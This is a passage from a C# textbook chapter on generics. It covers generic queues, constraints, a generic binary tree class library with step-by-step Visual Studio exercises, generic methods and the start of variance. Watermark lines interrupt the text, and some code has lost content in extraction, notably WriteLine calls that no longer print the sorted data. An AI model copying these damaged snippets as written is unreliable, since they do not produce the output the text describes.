In the class or structure that implements the
interface, specify the interface but do not
specify the indexer accessibility. For example:
Click here to view code image
struct RawInt : IRawInt
Download from finelybook [email protected]
565
{
...
bool IRawInt.this [ int index ]
{
get { ... }
set { ... }
}
...
}
Download from finelybook [email protected]
566
CHAPTER 17
Introducing generics
After completing this chapter, you will be able to:
Explain the purpose of generics.
Define a type-safe class by using generics.
Create instances of a generic class based on types specified as type
parameters.
Implement a generic interface.
Define a generic method that implements an algorithm independent of
the type of data on which it operates.
Chapter 8, “Understanding values and references,” shows you how to use
the object type to refer to an instance of any class. You can use the object
type to store a value of any type, and you can define parameters by using the
object type when you need to pass values of any type into a method. A
method can also return values of any type by specifying object as the return
type. Although this practice is very flexible, it puts the onus on the
programmer to remember what sort of data is actually being used. This can
lead to run-time errors if the programmer makes a mistake. In this chapter,
you will learn about generics, a feature that has been designed to help you
prevent this kind of mistake.
The problem: Misusing with the object type
Download from finelybook [email protected]
567
To understand generics, it is worth looking in detail at the problem they are
designed to solve.
Suppose that you need to model a first-in, first-out structure such as a
queue. You could create a class such as the following:
Click here to view code image
class Queue
{
private const int DEFAULTQUEUESIZE = 100;
private int[] data;
private int head = 0, tail = 0;
private int numElements = 0;
public Queue()
{
this.data = new int[DEFAULTQUEUESIZE];
}
public Queue(int size)
{
if (size > 0)
{
this.data = new int[size];
}
else
{
throw new ArgumentOutOfRangeException("size", "Must be
greater than zero");
}
}
public void Enqueue(int item)
{
if (this.numElements == this.data.Length)
{
throw new Exception("Queue full");
}
this.data[this.head] = item;
this.head++;
this.head %= this.data.Length;
this.numElements++;
}
public int Dequeue()
{
if (this.numElements == 0)
{
throw new Exception("Queue empty");
}
Download from finelybook [email protected]
568
int queueItem = this.data[this.tail];
this.tail++;
this.tail %= this.data.Length;
this.numElements--;
return queueItem;
}
}
This class uses an array to provide a circular buffer for holding the data.
The size of this array is specified by the constructor. An application uses the
Enqueue method to add an item to the queue and the Dequeue method to pull
an item from the queue. The private head and tail fields keep track of where
to insert an item into the array and where to retrieve an item from the array.
The numElements field indicates how many items are in the array. The
Enqueue and Dequeue methods use these fields to determine where to store
or retrieve an item and perform some rudimentary error checking. An
application can create a Queue object and call these methods, as shown in the
code example that follows. Notice that the items are dequeued in the same
order in which they are enqueued:
Click here to view code image
Queue queue = new Queue(); // Create a new Queue
queue.Enqueue(100);
queue.Enqueue(-25);
queue.Enqueue(33);
Console.WriteLine($"{queue.Dequeue()}"); // Displays 100
Console.WriteLine($"{queue.Dequeue()}"); // Displays -25
Console.WriteLine($"{queue.Dequeue()}"); // Displays 33
Now, the Queue class works well for queues of ints, but what if you want
to create queues of strings, or floats, or even queues of more complex types
such as Circle (see Chapter 7, “Creating and managing classes and objects”),
or Horse or Whale (see Chapter 12, “Working with inheritance”)? The
problem is that the way in which the Queue class is implemented restricts it
to items of type int, and if you try to enqueue a Horse, you will get a
compile-time error.
Click here to view code image
Queue queue = new Queue();
Horse myHorse = new Horse();
queue.Enqueue(myHorse); // Compile-time error: Cannot convert from
Horse to int
One way around this restriction is to specify that the array in the Queue
Download from finelybook [email protected]
569
class contains items of type object, update the constructors, and modify the
Enqueue and Dequeue methods to take an object parameter and return an
object, such as in the following:
Click here to view code image
class Queue
{
...
private object[] data;
...
public Queue()
{
this.data = new object[DEFAULTQUEUESIZE];
}
public Queue(int size)
{
...
this.data = new object[size];
...
}
public void Enqueue(object item)
{
...
}
public object Dequeue()
{
...
object queueItem = this.data[this.tail];
...
return queueItem;
}
}
Remember that you can use the object type to refer to a value or variable
of any type. All reference types automatically inherit (either directly or
indirectly) from the System.Object class in the Microsoft .NET Framework
(in C#, object is an alias for System.Object). Now, because the Enqueue and
Dequeue methods manipulate objects, you can operate on queues of Circles,
Horses, Whales, or any of the other classes that you have seen earlier in this
book. However, it is important to notice that you have to cast the value
returned by the Dequeue method to the appropriate type because the compiler
will not perform the conversion from the object type automatically.
Click here to view code image
Download from finelybook [email protected]
570
Queue queue = new Queue();
Horse myHorse = new Horse();
queue.Enqueue(myHorse); // Now legal – Horse is an object
...
Horse dequeuedHorse = (Horse)queue.Dequeue(); // Need to cast object
back to a Horse
If you don’t cast the returned value, you will get the compiler error
“Cannot implicitly convert type ‘object’ to ‘Horse.’” This requirement to
perform an explicit cast degenerates much of the flexibility afforded by the
object type. Furthermore, it is very easy to write code such as this:
Click here to view code image
Queue queue = new Queue();
Horse myHorse = new Horse();
queue.Enqueue(myHorse);
...
Circle myCircle = (Circle)queue.Dequeue(); // run-time error
Although this code will compile, it is not valid and throws a
System.InvalidCastException exception at runtime. The error is caused by
trying to store a reference to a Horse in a Circle variable when it is dequeued,
and the two types are not compatible. This error is not spotted until runtime
because the compiler does not have enough information to perform this check
at compile time. The real type of the object being dequeued becomes
apparent only when the code runs.
Another disadvantage of using the object approach to create generalized
classes and methods is that it can consume additional memory and processor
time if the runtime needs to convert an object to a value type and back again.
Consider the following piece of code that manipulates a queue of int values:
Click here to view code image
Queue queue = new Queue();
int myInt = 99;
queue.Enqueue(myInt); // box the int to an object
...
myInt = (int)queue.Dequeue(); // unbox the object to an int
The Queue data type expects the items it holds to be objects, and object is
a reference type. Enqueueing a value type, such as an int, requires it to be
boxed to convert it to a reference type. Similarly, dequeueing into an int
requires the item to be unboxed to convert it back to a value type. (See the
sections “Boxing” and “Unboxing” in Chapter 8 for more details.) Although
Download from finelybook [email protected]
571
boxing and unboxing happen transparently, they add performance overhead
because they involve dynamic memory allocations. This overhead is small for
each item, but it adds up when a program creates queues of large numbers of
value types.
The generics solution
C# provides generics to remove the need for casting, improve type safety,
reduce the amount of boxing required, and make it easier to create
generalized classes and methods. Generic classes and methods accept type
parameters, which specify the types of objects on which they operate. In C#,
you indicate that a class is a generic class by providing a type parameter in
angle brackets, like this:
class Queue<T>
{
...
}
The T in this example acts as a placeholder for a real type at compile time.
When you write code to instantiate a generic Queue, you provide the type
that should be substituted for T (Circle, Horse, int, and so on). When you
define the fields and methods in the class, you use this same placeholder to
indicate the type of these items, like this:
Click here to view code image
class Queue<T>
{
...
private T[] data; // array is of type 'T' where 'T' is the type
parameter
...
public Queue()
{
this.data = new T[DEFAULTQUEUESIZE]; // use 'T' as the data
type
}
public Queue(int size)
{
...
this.data = new T[size];
...
Download from finelybook [email protected]
572
}
public void Enqueue(T item) // use 'T' as the type of the method
parameter
{
...
}
public T Dequeue() // use 'T' as the type of the return value
{
...
T queueItem = this.data[this.tail]; // the data in the array
is of type 'T'
...
return queueItem;
}
}
The type parameter T can be any legal C# identifier, although the lone
character T is commonly used. It is replaced with the type you specify when
you create a Queue object. The following examples create a Queue of ints
and a Queue of Horses:
Click here to view code image
Queue<int> intQueue = new Queue<int>();
Queue<Horse> horseQueue = new Queue<Horse>();
Additionally, the compiler now has enough information to perform strict
type checking when you build the application. You no longer need to cast
data when you call the Dequeue method, and the compiler can trap any type
mismatch errors early:
Click here to view code image
intQueue.Enqueue(99);
int myInt = intQueue.Dequeue(); // no casting necessary
Horse myHorse = intQueue.Dequeue(); // compiler error: cannot
implicitly convert type 'int' to 'Horse'
You should be aware that this substitution of T for a specified type is not
simply a textual replacement mechanism. Instead, the compiler performs a
complete semantic substitution so that you can specify any valid type for T.
Here are more examples:
Click here to view code image
struct Person
{
Download from finelybook [email protected]
573
...
}
...
Queue<int> intQueue = new Queue<int>();
Queue<Person> personQueue = new Queue<Person>();
The first example creates a queue of integers, whereas the second example
creates a queue of Person values. The compiler also generates the versions of
the Enqueue and Dequeue methods for each queue. For the intQueue queue,
these methods look like this:
public void Enqueue(int item);
public int Dequeue();
For the personQueue queue, these methods look like this:
Click here to view code image
public void Enqueue(Person item);
public Person Dequeue();
Contrast these definitions with those of the object-based version of the
Queue class shown in the preceding section. In the methods derived from the
generic class, the item parameter to Enqueue is passed as a value type that
does not require boxing. Similarly, the value returned by Dequeue is also a
value type that does not need to be unboxed. A similar set of methods is
generated for the other two queues.
Note The System.Collections.Generic namespace in the .NET
Framework class library provides an implementation to the Queue class
that operates similarly to the class just described. This namespace also
includes several other collection classes, and they are described in more
detail in Chapter 18, “Using collections.”
The type parameter does not have to be a simple class or value type. For
example, you can create a queue of queues of integers (if you should ever
find it necessary), like this:
Click here to view code image
Download from finelybook [email protected]
574
Queue<Queue<int>> queueQueue = new Queue<Queue<int>>();
A generic class can have multiple type parameters. For example, the
generic Dictionary class defined in the System.Collections.Generic
namespace in the .NET Framework class library expects two type parameters:
one type for keys, and another for the values (this class is described in more
detail in Chapter 18).
Note You can also define generic structures and interfaces by using the
same type-parameter syntax as for generic classes.
Generics vs. generalized classes
It is important to be aware that a generic class that uses type parameters is
different from a generalized class designed to take parameters that can be cast
to different types. For example, the object-based version of the Queue class
shown earlier is a generalized class. There is a single implementation of this
class, and its methods take object parameters and return object types. You
can use this class with ints, strings, and many other types, but in each case,
you are using instances of the same class, and you have to cast the data you
are using to and from the object type.
Compare this with the Queue<T> class. Each time you use this class with
a type parameter (such as Queue<int> or Queue<Horse>), you cause the
compiler to generate an entirely new class that happens to have functionality
defined by the generic class. This means that Queue<int> is a completely
different type from Queue<Horse>, but they both happen to have the same
behavior. You can think of a generic class as one that defines a template that
is then used by the compiler to generate new type-specific classes on demand.
The type-specific versions of a generic class (Queue<int>, Queue<Horse>,
and so on) are referred to as constructed types, and you should treat them as
distinctly different types (albeit ones that have a similar set of methods and
properties).
Download from finelybook [email protected]
575
Generics and constraints
Occasionally, you will want to ensure that the type parameter used by a
generic class identifies a type that provides certain methods. For example, if
you are defining a PrintableCollection class, you might want to ensure that
all objects stored in the class have a Print method. You can specify this
condition by using a constraint.
By using a constraint, you can limit the type parameters of a generic class
to those that implement a particular set of interfaces and therefore provide the
methods defined by those interfaces. For example, if the IPrintable interface
defined the Print method, you could create the PrintableCollection class like
this:
Click here to view code image
public class PrintableCollection<T> where T : IPrintable
When you build this class with a type parameter, the compiler checks to
be sure that the type used for T actually implements the IPrintable interface;
if it doesn’t, it stops with a compilation error.
Creating a generic class
The System.Collections.Generic namespace in the .NET Framework class
library contains some generic classes readily available for you. You can also
define your own generic classes, which is what you will do in this section.
Before you do this, let’s cover a bit of background theory.
The theory of binary trees
In the following exercises, you will define and use a class that represents a
binary tree.
A binary tree is a useful data structure that you can use for a variety of
operations, including sorting and searching through data very quickly.
Volumes have been written on the minutiae of binary trees, but it is not the
purpose of this book to cover this topic in detail. Instead, you’ll look at just
the pertinent facts. If you are interested in learning more, consult a book such
Download from finelybook [email protected]
576
as The Art of Computer Programming, Volume 3: Sorting and Searching, 2nd
Edition by Donald E. Knuth (Addison-Wesley Professional, 1998). Despite
its age, this is the recognized, seminal work on sort and search algorithms.
A binary tree is a recursive (self-referencing) data structure that can be
empty or contain three elements: a datum, which is typically referred to as the
node, and two subtrees, which are themselves binary trees. The two subtrees
are conventionally called the left subtree and the right subtree because they
are typically depicted to the left and right of the node, respectively. Each left
subtree or right subtree is either empty or contains a node and other subtrees.
In theory, the whole structure can continue ad infinitum. The following image
shows the structure of a small binary tree.
The real power of binary trees becomes evident when you use them for
sorting data. If you start with an unordered sequence of objects of the same
type, you can construct an ordered binary tree and then walk through the tree
to visit each node in an ordered sequence. The algorithm for inserting an item
I into an ordered binary tree B is shown here:
Click here to view code image
If the tree, B, is empty
Then
Construct a new tree B with the new item I as the node, and empty
left and
right subtrees
Else
Examine the value of the current node, N, of the tree, B
If the value of N is greater than that of the new item, I
Then
If the left subtree of B is empty
Then
Construct a new left subtree of B with the item I as the node,
Download from finelybook [email protected]
577
and
empty left and right subtrees
Else
Insert I into the left subtree of B
End If
Else
If the right subtree of B is empty
Then
Construct a new right subtree of B with the item I as the node,
and
empty left and right subtrees
Else
Insert I into the right subtree of B
End If
End If
End If
Notice that this algorithm is recursive, calling itself to insert the item into
the left or right subtree depending on how the value of the item compares
with the current node in the tree.
Note The definition of the expression greater than depends on the type
of data in the item and node. For numeric data, greater than can be a
simple arithmetic comparison, and for text data, it can be a string
comparison; however, you must give other forms of data their own
means of comparing values. You will learn more about this when you
implement a binary tree in the upcoming section “Building a binary tree
class by using generics.”
If you start with an empty binary tree and an unordered sequence of
objects, you can iterate through the unordered sequence, inserting each object
into the binary tree by using this algorithm, resulting in an ordered tree. The
next image shows the steps in the process for constructing a tree from a set of
five integers.
After you have built an ordered binary tree, you can display its contents in
sequence by visiting each node in turn and printing the value found. The
algorithm for achieving this task is also recursive:
Download from finelybook [email protected]
578
Click here to view code image
If the left subtree is not empty
Then
Display the contents of the left subtree
End If
Display the value of the node
If the right subtree is not empty
Then
Display the contents of the right subtree
End If
Download from finelybook [email protected]
579
The following image shows the steps in the process for outputting the tree.
Notice that the integers are now displayed in ascending order.
Building a binary tree class by using generics
In the following exercise, you will use generics to define a binary tree class
capable of holding almost any type of data. The only restriction is that the
data type must provide a means of comparing values between different
instances.
The binary tree class is one that you might find useful in many different
applications. Therefore, you will implement it as a class library rather than as
an application in its own right. You can then use this class elsewhere without
Download from finelybook [email protected]
580
having to copy the source code and recompile it. A class library is a set of
compiled classes (and other types such as structures and delegates) stored in
an assembly. An assembly is a file that usually has the .dll suffix. Other
projects and applications can make use of the items in a class library by
adding a reference to its assembly and then bringing its namespaces into
scope by employing using directives. You will do this when you test the
binary tree class.
The System.IComparable and
System.IComparable<T> interfaces
The algorithm for inserting a node into a binary tree requires you to
compare the value of the node that you are inserting with nodes already
in the tree. If you are using a numeric type, such as int, you can use the
<, >, and == operators. However, if you are using some other type,
such as Mammal or Circle described in earlier chapters, how do you
compare objects?
If you need to create a class that requires you to be able to compare
values according to some natural (or possibly unnatural) ordering, you
should implement the IComparable interface. This interface contains a
method called CompareTo, which takes a single parameter specifying
the object to be compared with the current instance and returns an
integer that indicates the result of the comparison, as summarized by the
following table.
Value
Meaning
Less than 0
The current instance is less than the value of the
parameter.
0
The current instance is equal to the value of the
parameter.
Greater than
0
The current instance is greater than the value of the
parameter.
As an example, consider the Circle class that was described in
Chapter 7. Let’s take a look at it again here:
Download from finelybook [email protected]
581
Click here to view code image
class Circle
{
public Circle(int initialRadius)
{
radius = initialRadius;
}
public double Area()
{
return Math.PI * radius * radius;
}
private double radius;
}
You can make the Circle class “comparable” by implementing the
System.IComparable interface and providing the CompareTo method.
In this example, the CompareTo method compares Circle objects based
on their areas. A circle with a larger area is considered to be greater
than a circle with a smaller area.
Click here to view code image
class Circle : System.IComparable
{
...
public int CompareTo(object obj)
{
Circle circObj = (Circle)obj; // cast the parameter to
its real type
if (this.Area() == circObj.Area())
return 0;
if (this.Area() > circObj.Area())
return 1;
return -1;
}
}
If you examine the System.IComparable interface, you will see that
its parameter is defined as an object. However, this approach is not type
safe. To understand why this is so, consider what happens if you try to
pass something that is not a Circle to the CompareTo method. The
System.IComparable interface requires the use of a cast to access the
Area method. If the parameter is not a Circle but some other type of
object, this cast will fail. However, the System namespace also defines
Download from finelybook [email protected]
582
the generic IComparable<T> interface, which contains the following
method:
int CompareTo(T other);
Notice that this method takes a type parameter (T) rather than an
object, and therefore it is much safer than the nongeneric version of the
interface. The following code shows how you can implement this
interface in the Circle class:
Click here to view code image
class Circle : System.IComparable<Circle>
{
...
public int CompareTo(Circle other)
{
if (this.Area() == other.Area())
return 0;
if (this.Area() > other.Area())
return 1;
return -1;
}
}
The parameter for the CompareTo method must match the type
specified in the interface, IComparable<Circle>. In general, it is
preferable to implement the System.IComparable<T> interface rather
than the System.IComparable interface. You can also implement both,
just as many of the types in the .NET Framework do.
Create the Tree<TItem> class
1. Start Microsoft Visual Studio 2017 if it is not already running.
2. On the File menu, point to New, and then click Project.
3. In the New Project dialog box, in the Installed pane on the left, click
Visual C#. In the middle pane, select the Class Library (.NET
Framework) template. In the Name box, type BinaryTree. In the
Location box, specify \Microsoft Press\VCSBS\Chapter 17 in your
Documents folder, and then click OK.
Download from finelybook [email protected]
583
Note Make sure that you select the Class Library (.NET
Framework) template, and not Class Library (.NET Standard). The
.NET Framework template includes functionality that is specific to
Windows, and that is not available through the .NET Standard
template.
Using the Class Library template, you can create assemblies that can be
reused by different applications. To utilize a class in a class library in an
application, you must first copy the assembly containing the compiled
code for the class library to your computer (if you did not create it
yourself) and then add a reference to this assembly.
4. In Solution Explorer, right-click Class1.cs, click Rename and then
change the name of the file to Tree.cs. Allow Visual Studio to change
the name of the class as well as the name of the file when you are
prompted.
5. In the Code and Text Editor window, change the definition of the Tree
class to Tree<TItem>, as shown in bold in the following code:
public class Tree<TItem>
{
}
6. In the Code and Text Editor window, modify the definition of the
Tree<TItem> class to specify that the type parameter TItem must denote
a type that implements the generic IComparable<TItem> interface. The
changes are highlighted in bold in the code example that follows.
The modified definition of the Tree<TItem> class should look like this:
Click here to view code image
public class Tree<TItem> where TItem : IComparable<TItem>
{
}
7. Add three public, automatic properties to the Tree<TItem> class: a
TItem property called NodeData and Tree<TItem> properties called
Download from finelybook [email protected]
584
LeftTree and RightTree, as shown in the following code example in
bold:
Click here to view code image
public class Tree<TItem> where TItem : IComparable<TItem>
{
public TItem NodeData { get; set; }
public Tree<TItem> LeftTree { get; set; }
public Tree<TItem> RightTree { get; set; }
}
8. Add a constructor to the Tree<TItem> class that takes a single TItem
parameter called nodeValue. In the constructor, set the NodeData
property to nodeValue, and initialize the LeftTree and RightTree
properties to null, as shown in bold in the following code:
Click here to view code image
public class Tree<TItem> where TItem : IComparable<TItem>
{
...
public Tree(TItem nodeValue)
{
this.NodeData = nodeValue;
this.LeftTree = null;
this.RightTree = null;
}
}
Note Notice that the name of the constructor does not include the
type parameter; it is called Tree, not Tree<TItem>.
9. Add a public method called Insert to the Tree<TItem> class as shown in
bold in the code that follows. This method will insert a TItem value into
the tree (once you have completed it).
The method definition should look like this:
Click here to view code image
public class Tree<TItem> where TItem: IComparable<TItem>
Download from finelybook [email protected]
585
{
...
public void Insert(TItem newItem)
{
}
}
You will implement the recursive algorithm described earlier for
creating an ordered binary tree. The constructor creates the initial node
of the tree, so the Insert method can assume that the tree is not empty.
The code that follows is the part of the algorithm that runs after
checking whether the tree is empty. It’s reproduced here to help you
understand the code you will write for the Insert method in the
following steps:
Click here to view code image
...
Examine the value of the node, N, of the tree, B
If the value of N is greater than that of the new item, I
Then
If the left subtree of B is empty
Then
Construct a new left subtree of B with the item I as the
node, and empty
left and right subtrees
Else
Insert I into the left subtree of B
End If
...
10. In the Insert method, add a statement that declares a local variable of
type TItem, called currentNodeValue. Initialize this variable to the value
of the NodeData property of the tree, as shown in bold in the following
example:
Click here to view code image
public void Insert(TItem newItem)
{
TItem currentNodeValue = this.NodeData;
}
11. Add the if-else statement shown in bold in the following code to the
Insert method after the definition of the currentNodeValue variable.
This statement uses the CompareTo method of the IComparable<T>
Download from finelybook [email protected]
586
interface to determine whether the value of the current node is greater
than that of the new item:
Click here to view code image
public void Insert(TItem newItem)
{
TItem currentNodeValue = this.NodeData;
if (currentNodeValue.CompareTo(newItem) > 0)
{
// Insert the new item into the left subtree
}
else
{
// Insert the new item into the right subtree
}
}
12. In the if part of the code, immediately after the comment // Insert the
new item into the left subtree, add the following statements:
Click here to view code image
if (this.LeftTree == null)
{
this.LeftTree = new Tree<TItem>(newItem);
}
else
{
this.LeftTree.Insert(newItem);
}
These statements check whether the left subtree is empty. If so, a new
tree is created using the new item, and it is attached as the left subtree of
the current node; otherwise, the new item is inserted into the existing left
subtree by calling the Insert method recursively.
13. In the else part of the outermost if-else statement, immediately after the
comment // Insert the new item into the right subtree, add the equivalent
code that inserts the new node into the right subtree:
Click here to view code image
if (this.RightTree == null)
{
this.RightTree = new Tree<TItem>(newItem);
}
else
{
Download from finelybook [email protected]
587
this.RightTree.Insert(newItem);
}
14. Add another public method called WalkTree to the Tree<TItem> class
after the Insert method.
This method walks through the tree, visiting each node in sequence, and
generates a string representation of the data that the tree contains. The
method definition should look like this:
public string WalkTree()
{
}
15. Add the statements shown in bold in the code that follows to the
WalkTree method.
These statements implement the algorithm described earlier for
traversing a binary tree. As each node is visited, the node value is
appended to the string returned by the method:
Click here to view code image
public string WalkTree()
{
string result = "";
if (this.LeftTree != null)
{
result = this.LeftTree.WalkTree();
}
result += $" {this.NodeData.ToString()} ";
if (this.RightTree != null)
{
result += this.RightTree.WalkTree();
}
return result;
}
16. On the Build menu, click Build Solution. The class should compile
cleanly, but correct any errors that are reported and rebuild the solution
if necessary.
In the next exercise, you will test the Tree<TItem> class by creating
binary trees of integers and strings.
Download from finelybook [email protected]
588
Test the Tree<TItem> class
1. In Solution Explorer, right-click the BinaryTree solution, point to Add,
and then click New Project.
Note Be sure that you right-click the BinaryTree solution rather
than the BinaryTree project.
2. Add a new project by using the Console App (.NET Framework)
template. Give the project the name BinaryTreeTest. Set the location to
\Microsoft Press\VCSBS\Chapter 17 in your Documents folder, and then
click OK.
Note A Visual Studio 2017 solution can contain more than one
project. You are using this feature to add a second project to the
BinaryTree solution for testing the Tree<TItem> class.
3. In Solution Explorer, right-click the BinaryTreeTest project, and then
click Set As Startup Project.
The BinaryTreeTest project is highlighted in Solution Explorer. When
you run the application, this is the project that will actually execute.
4. In Solution Explorer, right-click the BinaryTreeTest project, point to
Add, and then click Reference. The Reference Manager dialog box
appears. You use this dialog box to add a reference to an assembly. This
enables you to use the classes and other types implemented by that
assembly in your code.
5. In the left pane of the Reference Manager BinaryTreeTest dialog box,
expand Projects and then click Solution. In the middle pane, select the
Download from finelybook [email protected]
589
BinaryTree project (be sure to select the check box and not simply click
the assembly), and then click OK.
This step adds the BinaryTree assembly to the list of references for the
BinaryTreeTest project in Solution Explorer. If you examine the
References folder for the BinaryTreeTest project in Solution Explorer,
you should see the BinaryTree assembly listed at the top. You will now
be able to create Tree<TItem> objects in the BinaryTreeTest project.
Note If the class library project is not part of the same solution as
the project that uses it, you must add a reference to the assembly
(the .dll file) and not to the class library project. You can do this by
browsing for the assembly in the Reference Manager dialog box.
You will use this technique in the final set of exercises in this
chapter.
Download from finelybook [email protected]
590
6. In the Code and Text Editor window displaying the Program class in the
Program.cs file, add the following using directive to the list at the top of
the class:
using BinaryTree;
7. Add the statements shown in bold in the following code to the Main
method:
Click here to view code image
static void Main(string[] args)
{
Tree<int> tree1 = new Tree<int>(10);
tree1.Insert(5);
tree1.Insert(11);
tree1.Insert(5);
tree1.Insert(-12);
tree1.Insert(15);
tree1.Insert(0);
tree1.Insert(14);
tree1.Insert(-8);
tree1.Insert(10);
tree1.Insert(8);
tree1.Insert(8);
string sortedData = tree1.WalkTree();
Console.WriteLine($"Sorted data is: ");
}
These statements create a new binary tree for holding ints. The
constructor creates an initial node containing the value 10. The Insert
statements add nodes to the tree, and the WalkTree method generates a
string representing the contents of the tree, which should appear sorted
in ascending order when this string is displayed.
Note Remember that the int keyword in C# is just an alias for the
System.Int32 type; whenever you declare an int variable, you are
actually declaring a struct variable of type System.Int32. The
System.Int32 type implements the IComparable and
IComparable<T> interfaces, which is why you can create
Tree<int> objects. Similarly, the string keyword is an alias for
Download from finelybook [email protected]
591
System.String, which also implements IComparable and
IComparable<T>.
8. On the Build menu, click Build Solution, and verify that the solution
compiles. Correct any errors if necessary.
9. On the Debug menu, click Start Without Debugging.
Verify that the program runs and displays the values in the following
sequence:
–12 –8 0 5 5 8 8 10 10 11 14 15
10. Press the Enter key to return to Visual Studio 2017.
11. Add the following statements shown in bold to the end of the Main
method in the Program class, after the existing code:
Click here to view code image
static void Main(string[] args)
{
...
Tree<string> tree2 = new Tree<string>("Hello");
tree2.Insert("World");
tree2.Insert("How");
tree2.Insert("Are");
tree2.Insert("You");
tree2.Insert("Today");
tree2.Insert("I");
tree2.Insert("Hope");
tree2.Insert("You");
tree2.Insert("Are");
tree2.Insert("Feeling");
tree2.Insert("Well");
tree2.Insert("!");
sortedData = tree2.WalkTree();
Console.WriteLine($"Sorted data is: ");
}
These statements create another binary tree for holding strings, populate
it with some test data, and then print the tree. This time the data should
be sorted alphabetically; the System.String class (string is an alias for
System.String) implements the IComparable and IComparable<string>
interfaces.
Download from finelybook [email protected]
592
12. On the Build menu, click Build Solution, and verify that the solution
compiles. Correct any errors if necessary.
13. On the Debug menu, click Start Without Debugging.
Verify that the program runs and displays the integer values as before,
followed by the strings in the following sequence:
! Are Are Feeling Hello Hope How I Today Well World You You
14. Press the Enter key to return to Visual Studio 2017.
Creating a generic method
As well as defining generic classes, you can create generic methods.
With a generic method, you can specify the types of the parameters and
the return type by using a type parameter like that used when you define a
generic class. In this way, you can define generalized methods that are type
safe and avoid the overhead of casting (and boxing, in some cases). Generic
methods are frequently used in conjunction with generic classes; you need
them for methods that take generic types as parameters or that have a return
type that is a generic type.
You define generic methods by using the same type parameter syntax you
use when you create generic classes. (You can also specify constraints.) For
example, the generic Swap<T> method in the code that follows swaps the
values in its parameters. Because this functionality is useful regardless of the
type of data being swapped, it is helpful to define it as a generic method:
Click here to view code image
static void Swap<T>(ref T first, ref T second)
{
T temp = first;
first = second;
second = temp;
}
You invoke the method by specifying the appropriate type for its type
parameter. The following examples show how to invoke the Swap<T>
method to swap over two ints and two strings:
Download from finelybook [email protected]
593
Click here to view code image
int a = 1, b = 2;
Swap<int>(ref a, ref b);
...
string s1 = "Hello", s2 = "World";
Swap<string>(ref s1, ref s2);
Note Just as instantiating a generic class with different type parameters
causes the compiler to generate different types, each distinct use of the
Swap<T> method causes the compiler to generate a different version of
the method. Swap<int> is not the same method as Swap<string>—both
methods just happen to have been generated from the same generic
template, so they exhibit the same behavior, albeit over different types.
Defining a generic method to build a binary tree
In the previous exercise, you created a generic class for implementing a
binary tree. The Tree<TItem> class provides the Insert method for adding
data items to the tree. However, if you want to add a large number of items,
repeated calls to the Insert method are not very convenient. In the following
exercise, you will define a generic method called InsertIntoTree that you can
use to insert a list of data items into a tree with a single method call. You will
test this method by using it to insert a list of characters into a tree of
characters.
Write the InsertIntoTree method
1. Using Visual Studio 2017, create a new project by using the Console
App (.NET Framework) template. In the New Project dialog box, name
the project BuildTree. Set the location to \Microsoft
Press\VCSBS\Chapter 17 in your Documents folder. In the Solution
drop-down list, click Create New Solution and then click OK.
2. On the Project menu, click Add Reference.
Download from finelybook [email protected]
594
3. In the Reference Manager - BuildTree dialog box, click the Browse
button (not the Browse tab in the left pane).
4. In the Select The Files To Reference dialog box, browse to the folder
\Microsoft Press\VCSBS\Chapter 17\BinaryTree\BinaryTree\bin\Debug
in your Documents folder, click BinaryTree.dll, and then click Add.
5. In the Reference Manager – BuildTree dialog box, verify that the
BinaryTree.dll assembly is listed and that the check box for this
assembly is selected, and then click OK.
The BinaryTree assembly is added to the list of references shown in
Solution Explorer.
6. In the Code and Text Editor window displaying the Program.cs file, add
the following using directive to the top of the Program.cs file:
using BinaryTree;
Remember, this namespace contains the Tree<TItem> class.
7. After the Main method in the Program class, add a method named
InsertIntoTree. This method should be declared as a static void method
that takes a Tree<TItem> parameter and a params array of TItem
Download from finelybook [email protected]
595
elements called data. The tree parameter should be passed by reference,
for reasons that will be described in a later step.
The method definition should look like this:
Click here to view code image
static void InsertIntoTree<TItem>(ref Tree<TItem> tree, params
TItem[] data)
{
}
8. The TItem type used for the elements being inserted into the binary tree
must implement the IComparable<TItem> interface. Modify the
definition of the InsertIntoTree method and add the where clause shown
in bold in the following code:
Click here to view code image
static void InsertIntoTree<TItem>(ref Tree<TItem> tree, params
TItem[] data) where TItem :IComparable<TItem>
{
}
9. Add the statements shown in bold in the example that follows to the
InsertIntoTree method.
These statements iterate through the params list, adding each item to the
tree by using the Insert method. If the value specified by the tree
parameter is null initially, a new Tree<TItem> is created; this is why the
tree parameter is passed by reference.
Click here to view code image
static void InsertIntoTree<TItem>(ref Tree<TItem> tree, params
TItem[] data) where TItem : IComparable<TItem>
{
foreach (TItem datum in data)
{
if (tree == null)
{
tree = new Tree<TItem>(datum);
}
else
{
tree.Insert(datum);
}
}
Download from finelybook [email protected]
596
}
Test the InsertIntoTree method
1. In the Main method of the Program class, add the following statements
shown in bold. This code creates a new Tree for holding character data,
populates it with some sample data by using the InsertIntoTree method,
and then displays it by using the WalkTree method of Tree:
Click here to view code image
static void Main(string[] args)
{
Tree<char> charTree = null;
InsertIntoTree<char>(ref charTree, 'M', 'X', 'A', 'M', 'Z',
'Z', 'N');
string sortedData = charTree.WalkTree();
Console.WriteLine($"Sorted data is: ");
}
2. On the Build menu, click Build Solution, verify that the solution
compiles, and then correct any errors if necessary.
3. On the Debug menu, click Start Without Debugging.
Verify that the program runs and displays the character values in the
following order:
A M M N X Z Z
4. Press the Enter key to return to Visual Studio 2017.
Variance and generic interfaces
Chapter 8 demonstrates that you can use the object type to hold a value or
reference of any other type. For example, the following code is completely
legal:
Click here to view code image
string myString = "Hello";
object myObject = myString;
Remember that in inheritance terms, the String class is derived from the
Download from finelybook [email protected]
597
Object class, so all strings are objects.
Now consider the following generic interface and class:
Click here to view code image
interface IWrapper<T>
{
void SetData(T data);
T GetData();
}
class Wrapper<T> : IWrapper<T>
{
private T storedData;
void IWrapper<T>.SetData(T data)
{
this.storedData = data;
}
T IWrapper<T>.GetData()
{
return this.storedData;
}
}
The Wrapper<T> class provides a simple wrapper around a specified
type. The IWrapper interface defines the SetData method that the
Wrapper<T> class implements to store the data and the GetData method that
the Wrapper<T> class implements to retrieve the data. You can create an
instance of this class and use it to wrap a string like this:
Click here to view code image
Wrapper<string> stringWrapper = new Wrapper<string>();
IWrapper<string> storedStringWrapper = stringWrapper;
storedStringWrapper.SetData("Hello");
Console.WriteLine($"Stored value is
{storedStringWrapper.GetData()}");
The code creates an instance of the Wrapper<string> type. It references
the object through the IWrapper<string> interface to call the SetData
method. (The Wrapper<T> type implements its interfaces explicitly, so you
must call the methods through an appropriate interface reference.) The code
also calls the GetData method through the IWrapper<string> interface. If
you run this code, it outputs the message “Stored value is Hello.”
Download from finelybook [email protected]
598
Take a look at the following line of code:
Click here to view code image
